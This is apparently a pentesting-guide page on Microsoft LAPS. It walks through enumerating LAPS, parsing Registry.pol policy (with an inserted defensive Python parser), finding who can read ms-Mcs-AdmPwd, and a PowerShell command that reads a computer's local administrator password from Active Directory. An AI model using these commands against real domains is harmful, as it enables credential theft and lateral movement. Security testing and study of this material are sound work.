The Pentesting Guide
LAPS

Last updated 1 year ago

Introduction

Local Administrator Password Solution (LAPS) is a Microsoft tool that helps organizations secure their local administrator accounts on Windows-based computers. It provides a unique, randomly generated password for each local administrator account on every managed computer in an organization's network, and stores the password securely in Active Directory.

Enumeration

There are three main ways to check if LAPS is enabled on the machine you have access to.

  • Check if AdmPwd.dll, the LAPS client-side extension, exists on the system.

dir "C:\Program Files\LAPS\CSE"

  • Check for GPOs whose display name contains "LAPS".

Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

  • Check for computer objects whose ms-Mcs-AdmPwdExpirationTime attribute is not null (LAPS only sets it on managed computers).

Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

Exploitation

1. Download Registry.pol, located under the GPCFileSysPath obtained while enumerating GPOs.

ls <GPCFileSysPath>\Machine\Registry.pol

2. Parse the file with the following command from the GPRegistryPolicyParser module.

Parse-PolFile .\Desktop\Registry.pol

After parsing the file, you can obtain the following information:

  • Password complexity is upper, lower and numbers.

  • Password length is 14.

  • Passwords are changed every 30 days.

  • The LAPS managed account name is LapsAdmin.

  • Password expiration protection is disabled.
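The findings above come straight out of the Registry.pol binary. To show what Parse-PolFile is actually decoding, here is an added example (not the guide's code and not GPRegistryPolicyParser) that parses the Registry.pol format and summarises the LAPS policy the way a defender reviewing a GPO would. It assumes the legacy LAPS ADMX registry key `Software\Policies\Microsoft Services\AdmPwd` and its value names (`AdmPwdEnabled`, `PasswordComplexity`, `PasswordLength`, `PasswordAgeDays`, `AdminAccountName`, `PwdExpirationProtectionEnabled`) together with the client defaults; the sample file is constructed inline to reproduce exactly the settings listed above.

```python
import struct
import sys

REG_SZ = 1
REG_DWORD = 4

# Key and value names from the legacy LAPS ADMX template (assumption, not from the guide).
LAPS_KEY = r"Software\Policies\Microsoft Services\AdmPwd"
COMPLEXITY = {1: "upper", 2: "upper and lower",
              3: "upper, lower and numbers", 4: "upper, lower, numbers and specials"}


def _w(s):
    """Registry.pol stores every string, bracket and semicolon as UTF-16LE."""
    return s.encode("utf-16-le")


def build_pol(entries):
    """Serialise (key, value, type, raw data) tuples into a Registry.pol blob:
    "PReg" + version 1, then per entry  [ key\0 ; value\0 ; type ; size ; data ]"""
    out = b"PReg" + struct.pack("<I", 1)
    for key, value, vtype, data in entries:
        out += _w("[") + _w(key) + b"\x00\x00" + _w(";") + _w(value) + b"\x00\x00" + _w(";")
        out += struct.pack("<I", vtype) + _w(";") + struct.pack("<I", len(data)) + _w(";")
        out += data + _w("]")
    return out


def parse_pol(blob):
    """Parse a Registry.pol blob into a list of (key, value, type, decoded data)."""
    if blob[:4] != b"PReg":
        raise ValueError("not a Registry.pol file: missing PReg signature")
    version = struct.unpack_from("<I", blob, 4)[0]
    if version != 1:
        raise ValueError("unsupported Registry.pol version %d" % version)

    def wstr(pos):
        # Read a NUL-terminated UTF-16LE string one code unit at a time so the
        # terminator is never matched across a code-unit boundary.
        units = []
        while True:
            unit = blob[pos:pos + 2]
            if len(unit) < 2:
                raise ValueError("truncated string at offset %d" % pos)
            pos += 2
            if unit == b"\x00\x00":
                return b"".join(units).decode("utf-16-le"), pos
            units.append(unit)

    def expect(pos, ch):
        if blob[pos:pos + 2] != _w(ch):
            raise ValueError("expected %r at offset %d" % (ch, pos))
        return pos + 2

    entries, pos = [], 8
    while pos < len(blob):
        pos = expect(pos, "[")
        key, pos = wstr(pos)
        pos = expect(pos, ";")
        value, pos = wstr(pos)
        pos = expect(pos, ";")
        vtype = struct.unpack_from("<I", blob, pos)[0]
        pos = expect(pos + 4, ";")
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = expect(pos + 4, ";")
        data = blob[pos:pos + size]
        pos = expect(pos + size, "]")
        if vtype == REG_DWORD and size == 4:
            data = struct.unpack("<I", data)[0]
        elif vtype == REG_SZ:
            data = data.decode("utf-16-le").rstrip("\x00")
        entries.append((key, value, vtype, data))
    return entries


def summarize_laps(entries):
    """Collect the LAPS values; unset values fall back to the client defaults
    (assumed: complexity 4, length 14, age 30 days, built-in Administrator)."""
    vals = {v: d for k, v, _t, d in entries if k.lower() == LAPS_KEY.lower()}
    return {"enabled": vals.get("AdmPwdEnabled", 0) == 1,
            "complexity": COMPLEXITY.get(vals.get("PasswordComplexity", 4), "unknown"),
            "length": vals.get("PasswordLength", 14),
            "age_days": vals.get("PasswordAgeDays", 30),
            "account": vals.get("AdminAccountName", "Administrator"),
            "expiration_protection": vals.get("PwdExpirationProtectionEnabled", 0) == 1}


def review(summary):
    """Flag settings a defender would tighten before the GPO ships."""
    issues = []
    if not summary["enabled"]:
        issues.append("LAPS password management is not enabled by this GPO")
    if not summary["expiration_protection"]:
        issues.append("expiration protection is disabled: ms-Mcs-AdmPwdExpirationTime can be "
                      "set beyond the policy maximum, so a password may never rotate")
    if summary["length"] < 14:
        issues.append("password length %d is below the 14-character default" % summary["length"])
    if summary["age_days"] > 30:
        issues.append("password age %d days exceeds the 30-day default" % summary["age_days"])
    if summary["complexity"] != COMPLEXITY[4]:
        issues.append("complexity is '%s'; special characters are not required" % summary["complexity"])
    return issues


# Constructed sample reproducing the settings the guide lists (not a real capture).
SAMPLE_POL = build_pol([
    (LAPS_KEY, "AdmPwdEnabled", REG_DWORD, struct.pack("<I", 1)),
    (LAPS_KEY, "PasswordComplexity", REG_DWORD, struct.pack("<I", 3)),
    (LAPS_KEY, "PasswordLength", REG_DWORD, struct.pack("<I", 14)),
    (LAPS_KEY, "PasswordAgeDays", REG_DWORD, struct.pack("<I", 30)),
    (LAPS_KEY, "AdminAccountName", REG_SZ, _w("LapsAdmin") + b"\x00\x00"),
    (LAPS_KEY, "PwdExpirationProtectionEnabled", REG_DWORD, struct.pack("<I", 0)),
])

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_POL
    summary = summarize_laps(parse_pol(blob))
    for name, val in summary.items():
        print("%-22s %s" % (name, val))
    for issue in review(summary):
        print("!", issue)
```

Run it with a path to a real `Machine\Registry.pol` to review an actual GPO, or with no argument to walk the constructed sample; on the sample it reports the two weaknesses in the findings above (no expiration protection, no special characters required).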

3. Next, find out who can read the LAPS password. There are two alternatives.

  • Directly inspecting the ACLs of the computer objects.

# Obtain the SID of every principal with ReadProperty on ms-Mcs-AdmPwd
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
# Convert the SID to a name
ConvertFrom-SID <SecurityIdentifier>

  • Using the LAPSToolkit.

. .\LAPSToolkit.ps1
Find-LAPSDelegatedGroups

Find-LAPSDelegatedGroups will query each OU and find domain groups that have delegated read access. Find-AdmPwdExtendedRights goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them.

4. Once you have the permissions to read the password, you can read it as follows.

Get-DomainComputer -Identity <HOSTNAME> -Properties ms-Mcs-AdmPwd

  • GPRegistryPolicyParser (Parse-PolFile)
  • LAPSToolkit (Find-LAPSDelegatedGroups, Find-AdmPwdExtendedRights)